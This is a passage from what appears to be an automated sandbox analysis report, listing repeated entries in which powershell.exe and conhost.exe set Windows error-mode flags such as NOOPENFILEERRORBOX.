Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
